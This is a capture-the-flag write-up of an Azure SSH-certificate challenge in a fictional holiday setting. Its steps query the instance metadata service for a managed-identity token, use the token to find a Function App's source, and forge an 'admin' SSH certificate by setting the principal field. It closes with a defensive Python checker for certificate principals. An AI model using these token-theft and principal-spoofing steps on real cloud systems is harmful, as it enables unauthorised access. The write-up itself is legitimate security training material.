Certificate SSHenanigans
Location - Pixel Island: Rainraster Cliffs
Hello there! Alabaster Snowball at your service.
I could use your help with my fancy new Azure server at ssh-server-vm.santaworkshopgeeseislands.org.
ChatNPT suggested I upgrade the host to use SSH certificates, such a great idea!
It even generated ready-to-deploy code for an so elves can request their own certificates. What a timesaver!
I'm a little wary though. I'd appreciate it if you could take a peek and confirm everything's secure before I deploy this configuration to all the Geese Islands servers.
Generate yourself a certificate and use the monitor account to access the host. See if you can grab my TODO list.
If you haven't heard of SSH certificates, Thomas Bouve gave an introductory talk and demo on that topic recently.
Oh, and if you need to peek at the Function App code, there's a handy which will give you details about how the Function App is deployed.
First, we look at what the Azure web app provides. It looks like it generates an SSH certificate for specific principals.
We can save this certificate as id_rsa-cert.pub to authenticate to the server as the user "monitor".
We can exit the running SatTracker with Ctrl+C.
From here, we can use the Azure REST API to enumerate the system and try to gain access to the app's source code.
First, we query the instance metadata endpoint. This gives us the resource group, subscription ID, and more.
monitor@ssh-server-vm:~$ curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq
{
"compute": {
"azEnvironment": "AzurePublicCloud",
"customData": "",
"evictionPolicy": "",
"isHostCompatibilityLayerVm": "false",
"licenseType": "",
"location": "eastus",
"name": "ssh-server-vm",
"offer": "",
"osProfile": {
"adminUsername": "",
"computerName": "",
"disablePasswordAuthentication": ""
},
"osType": "Linux",
"placementGroupId": "",
"plan": {
"name": "",
"product": "",
"publisher": ""
},
"platformFaultDomain": "0",
"platformUpdateDomain": "0",
"priority": "",
"provider": "Microsoft.Compute",
"publicKeys": [],
"publisher": "",
"resourceGroupName": "northpole-rg1",
"resourceId": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Compute/virtualMachines/ssh-server-vm",
"securityProfile": {
"secureBootEnabled": "false",
"virtualTpmEnabled": "false"
},
"sku": "",
"storageProfile": {
"dataDisks": [],
"imageReference": {
"id": "",
"offer": "",
"publisher": "",
"sku": "",
"version": ""
},
"osDisk": {
"caching": "ReadWrite",
"createOption": "Attach",
"diffDiskSettings": {
"option": ""
},
"diskSizeGB": "30",
"encryptionSettings": {
"enabled": "false"
},
"image": {
"uri": ""
},
"managedDisk": {
"id": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Compute/disks/ssh-server-vm_os_disk",
"storageAccountType": "Standard_LRS"
},
"name": "ssh-server-vm_os_disk",
"osType": "Linux",
"vhd": {
"uri": ""
},
"writeAcceleratorEnabled": "false"
},
"resourceDisk": {
"size": "63488"
}
},
"subscriptionId": "2b0942f3-9bca-484b-a508-abdae2db5e64",
"tags": "Project:HHC23",
"tagsList": [
{
"name": "Project",
"value": "HHC23"
}
],
"userData": "",
"version": "",
"vmId": "1f943876-80c5-4fc2-9a77-9011b0096c78",
"vmScaleSetName": "",
"vmSize": "Standard_B4ms",
"zone": ""
},
"network": {
"interface": [
{
"ipv4": {
"ipAddress": [
{
"privateIpAddress": "10.0.0.50",
"publicIpAddress": ""
}
],
"subnet": [
{
"address": "10.0.0.0",
"prefix": "24"
}
]
},
"ipv6": {
"ipAddress": []
},
"macAddress": "6045BDFE2D67"
}
]
}
}
Next, we get an authorization token from the OAuth endpoint.
monitor@ssh-server-vm:~$ curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F' -H Metadata:true -s
{"access_token":"<access token removed>","client_id":"b84e06d3-aba1-4bcc-9626-2e0d76cba2ce","expires_in":"86285","expires_on":"1704341254","ext_expires_in":"86399","not_before":"1704254554","resource":"https://management.azure.com/","token_type":"Bearer"}
With the token, we query the source control configuration of the northpole-ssh-certs-fa Function App through the Azure management API.
monitor@ssh-server-vm:~$ curl -X GET https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Web/sites/northpole-ssh-certs-fa/sourcecontrols/web?api-version=2022-03-01 -H "Authorization: Bearer <access_token>"
{"id":"/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Web/sites/northpole-ssh-certs-fa/sourcecontrols/web","name":"northpole-ssh-certs-fa","type":"Microsoft.Web/sites/sourcecontrols","location":"East US","tags":{"project":"northpole-ssh-certs","create-cert-func-url-path":"/api/create-cert?code=candy-cane-twirl"},"properties":{"repoUrl":"https://github.com/SantaWorkshopGeeseIslandsDevOps/northpole-ssh-certs-fa","branch":"main","isManualIntegration":false,"isGitHubAction":true,"deploymentRollbackEnabled":false,"isMercurial":false,"provisioningState":"Succeeded","gitHubActionConfiguration":{"codeConfiguration":null,"containerConfiguration":null,"isLinux":true,"generateWorkflowFile":true,"workflowSettings":{"appType":"functionapp","publishType":"code","os":"linux","variables":{"runtimeVersion":"3.11"},"runtimeStack":"python","workflowApiVersion":"2020-12-01","useCanaryFusionServer":false,"authType":"publishprofile"}}}}
When we look at the source code, we see that the application lets the caller set the value of "principal" in the request.
That means we can seemingly request SSH certificates for other users, or "principals". So we try a default principal, "admin", and when we send the request, we get an SSH certificate back:
┌──(stitch㉿snore)-[~]
└─$ curl -X POST https://northpole-ssh-certs-fa.azurewebsites.net/api/create-cert?code=candy-cane-twirl -H "Content-Type: application/json" --data '{"ssh_pub_key":"ssh-rsa <public key>","principal":"admin"}'
{"ssh_cert": "rsa-sha2-512-cert-v01@openssh.com AAAAIXJzYS1zaGEyLTUxMi1jZXJ0LXYwMUBvcGVuc3NoLmNvbQAAACcxMDE2NzYwMTU0MDAzNjQ5NDYyNzI2MTc5MjUzMDUxNzUyNDk0MDEAAAADAQABAAABgQDMdIA9qVovsAm23Tfn1+DbYTUvnRgYHAgFt2PRqHWlCt01KS0i5P3RuHLIKKVYOyR3X+HxuOZOHgU/Iy3LggxPImIKh+5AaE0WHGll5krsT0FFjvWKv4k+cua3Hy/RUW8QSQCk6/iyRiNXGH2deKuDNn+koIBqBLVelXa7G7zsEbx2vm0ud4hAhnqQDM5BcwCgGGqUGyrtgVXh1ogjAKfZR5q9l59Zk2yNJ2tRDSp4ffdAbw1xO1fMbD1YZ6VGvbu6uUf8JL+939cnwGTL8LgMXCZ7c2a50M3G9Ctcu8zs0RiJ/zJ2/UOwzJLOmGYJuDjXQLHiuG+PV8GTXATNe0QS1xkZKdEfqXhgSlmwpvZ+wCP4OHDtkAStO61GRdAXwieMsklFk7QS5iQWAGTCVfgun0aqt+TaHBcYbc+40xOrMe7fcCm0jEVXSQBq/Q11DdhKP2PMZviTYo6eVn08GOQSf2Ne53X8TPTQxxZrbqOLHEWZX+YUecKXxGs41c+bc6kAAAAAAAAAAQAAAAEAAAAkYWYxZGMyNDYtNzkxYi00MmFjLWI4NTEtNTEwMWFhNmE0NzQ4AAAACQAAAAVhZG1pbgAAAABllOsRAAAAAGW51j0AAAAAAAAAEgAAAApwZXJtaXQtcHR5AAAAAAAAAAAAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIGk2GNMCmJkXPJHHRQH9+TM4CRrsq/7BL0wp+P6rCIWHAAAAUwAAAAtzc2gtZWQyNTUxOQAAAEDk5JVahtJOoNzzRLDysk1eqaRLz47hhAzDBiIzoNfa2Ynil6aXu/d8c2B0dA/KgmqvXQVvlNIAr5Sdadjkw5kE ", "principal": "admin"}
┌──(stitch㉿snore)-[~]
└─$ cp id_rsa-cert.pub .ssh
┌──(stitch㉿snore)-[~]
└─$ ssh alabaster@ssh-server-vm.santaworkshopgeeseislands.org
alabaster@ssh-server-vm:~$ ls
alabaster_todo.md impacket
alabaster@ssh-server-vm:~$ cat alabaster_todo.md
# Geese Islands IT & Security Todo List
- [X] Sleigh GPS Upgrade: Integrate the new "Island Hopper" module into Santa's sleigh GPS. Ensure Rudolph's red nose doesn't interfere with the signal.
- [X] Reindeer Wi-Fi Antlers: Test out the new Wi-Fi boosting antler extensions on Dasher and Dancer. Perfect for those beach-side internet browsing sessions.
- [ ] Palm Tree Server Cooling: Make use of the island's natural shade. Relocate servers under palm trees for optimal cooling. Remember to watch out for falling coconuts!
- [ ] Eggnog Firewall: Upgrade the North Pole's firewall to the new EggnogOS version. Ensure it blocks any Grinch-related cyber threats effectively.
- [ ] Gingerbread Cookie Cache: Implement a gingerbread cookie caching mechanism to speed up data retrieval times. Don't let Santa eat the cache!
- [ ] Toy Workshop VPN: Establish a secure VPN tunnel back to the main toy workshop so the elves can securely access to the toy blueprints.
- [ ] Festive 2FA: Roll out the new two-factor authentication system where the second factor is singing a Christmas carol. Jingle Bells is said to be the most secure.
We found during this challenge that the application written by ChatNPT was not secure: it allowed us to request SSH certificates as other users on the machine.
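One way to audit what a signing service like this hands out, as an added example (not code from the challenge or the Function App): it reads the principals out of an OpenSSH certificate following the PROTOCOL.certkeys field layout and reports any that fall outside an allowlist. The sample certificate is constructed and unsigned, the allowlist passed in is an assumption, and the parser reads fields only; it does not verify the CA signature.

```python
import base64
import struct

# Public-key fields between the nonce and the serial, per key family
# (OpenSSH PROTOCOL.certkeys). mpints are length-prefixed like strings.
KEY_FIELDS = {"rsa": 2, "dss": 4, "ecdsa": 2, "ed25519": 1}

def read_string(buf, off):
    """Read one SSH string (uint32 length + bytes); return (value, next offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    if off + 4 + n > len(buf):
        raise ValueError("truncated field")
    return buf[off + 4:off + 4 + n], off + 4 + n

def parse_cert(line):
    """Read identity fields from '<type> <base64> [comment]'; no signature check."""
    blob = base64.b64decode(line.split()[1], validate=True)
    raw_type, off = read_string(blob, 0)
    ctype = raw_type.decode()
    family = next((k for k in KEY_FIELDS if k in ctype.split("-")), None)
    if family is None or ctype.startswith("sk-") or "-cert-v01@" not in ctype:
        raise ValueError("unsupported certificate type: " + ctype)
    for _ in range(1 + KEY_FIELDS[family]):  # skip the nonce, then the key fields
        _, off = read_string(blob, off)
    serial, cert_type = struct.unpack_from(">QI", blob, off)
    key_id, off = read_string(blob, off + 12)
    packed, _ = read_string(blob, off)  # principals: strings packed in a string
    principals, pos = [], 0
    while pos < len(packed):
        name, pos = read_string(packed, pos)
        principals.append(name.decode())
    return {"type": ctype, "serial": serial, "host_cert": cert_type == 2,
            "key_id": key_id.decode(), "principals": principals}

def unexpected_principals(line, allowed):
    """Principals outside `allowed`; an empty list means any principal, shown as '*'."""
    found = parse_cert(line)["principals"]
    return sorted(set(found) - set(allowed)) if found else ["*"]

def _s(data):
    return struct.pack(">I", len(data)) + data

def constructed_cert(principals):
    """Constructed sample: dummy key material, cut off after the principals, unsigned."""
    ctype = b"rsa-sha2-512-cert-v01@openssh.com"
    names = b"".join(_s(p.encode()) for p in principals)
    body = (_s(ctype) + _s(b"\x00" * 32) + _s(b"\x01\x00\x01") + _s(b"\x00\xc1" * 8)
            + struct.pack(">QI", 1, 1) + _s(b"constructed-key-id") + _s(names))
    return ctype.decode() + " " + base64.b64encode(body).decode()
```

Calling unexpected_principals(constructed_cert(["admin"]), {"monitor"}) returns ["admin"]; the same check can run over the contents of a real id_rsa-cert.pub file.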
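The repoUrl property in the sourcecontrols response above points to the GitHub repository with the source code: https://github.com/SantaWorkshopGeeseIslandsDevOps/northpole-ssh-certs-fa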